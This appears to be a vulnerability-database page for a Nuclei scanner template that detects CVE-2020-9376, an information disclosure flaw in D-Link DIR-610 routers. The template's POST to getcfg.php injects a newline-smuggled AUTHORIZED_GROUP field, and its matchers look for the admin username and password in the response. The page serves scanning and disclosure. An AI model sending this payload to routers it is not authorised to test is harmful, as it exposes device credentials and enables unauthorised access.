Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-9376
HistoryJan 12, 2021 - 4:15 p.m.

D-Link DIR-610 Devices - Information Disclosure

2021-01-1216:15:12
ProjectDiscovery
github.com
7

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

High

0.97 High

EPSS

Percentile

99.7%

D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
id: CVE-2020-9376

info:
  name: D-Link DIR-610 Devices - Information Disclosure
  author: whynotke
  severity: high
  description: |
    D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
    NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
  impact: |
    An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the vulnerability.
  reference:
    - https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
    - https://www.dlink.com.br/produto/dir-610/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9376
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-9376
    cwe-id: CWE-74
    epss-score: 0.96966
    epss-percentile: 0.99728
    cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-610_firmware
  tags: cve,cve2020,dlink,disclosure,router

http:
  - method: POST
    path:
      - "{{BaseURL}}/getcfg.php"

    body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<name>Admin</name>"
          - "</usrid>"
          - "</password>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009b4839c9662183e844be6af75890ea70fb4cd6e764609151db2fe34feef597f902205575561bae2d0f10da8356d98deb4e71c3ce87a9064ab8b541e4d68416eeb22c:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

High

0.97 High

EPSS

Percentile

99.7%